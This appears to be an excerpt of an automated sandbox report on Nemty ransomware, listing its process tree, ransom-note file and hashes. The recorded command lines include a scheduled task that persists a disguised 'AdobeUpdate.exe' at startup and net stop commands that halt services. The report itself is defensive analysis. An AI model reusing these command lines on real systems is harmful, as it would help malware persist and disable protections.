    command line: "C:\Windows\System32\cmd.exe" /c schtasks.exe /create /sc onstart /tn "NEMTY_LTM73P4" /tr "C:\Users\Admin\AdobeUpdate.exe"
    - C:\Windows\SysWOW64\schtasks.exe
      command line: schtasks.exe /create /sc onstart /tn "NEMTY_LTM73P4" /tr "C:\Users\Admin\AdobeUpdate.exe"
      signatures: Creates scheduled task(s)
  - C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\NEMTY_LTM73P4-DECRYPT.txt"
    - C:\Windows\SysWOW64\NOTEPAD.EXE
      command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\NEMTY_LTM73P4-DECRYPT.txt
- C:\Windows\system32\vssvc.exe
  command line: C:\Windows\system32\vssvc.exe
  signatures: Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\net1.exe
  command line: C:\Windows\system32\net1 stop QBCFMontorService
- C:\Windows\SysWOW64\net1.exe
  command line: C:\Windows\system32\net1 stop
- C:\Windows\SysWOW64\net1.exe
  command line: C:\Windows\system32\net1 stop
- C:\Windows\SysWOW64\net1.exe
  command line: C:\Windows\system32\net1 stop
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\NEMTY_LTM73P4-DECRYPT.txt
  MD5: 87c36b4ecc22c87362a66277c2ad5532
  SHA1: 4110bef7d90f87d4356c07b2e0829e4ebe545fe6
  SHA256: 90d26ae395048c54a95b5ef9bf9b14cd49f5148e7a033f1d2d7e2d70901b8a2e
  SHA512: a23f2752b3173cfa57cbbfe3efe75637b02465e16c97899df7f752808c9d0f013695db222474d3a1c0b34cde6667614807d0ee5c224cead10ad101513e850f72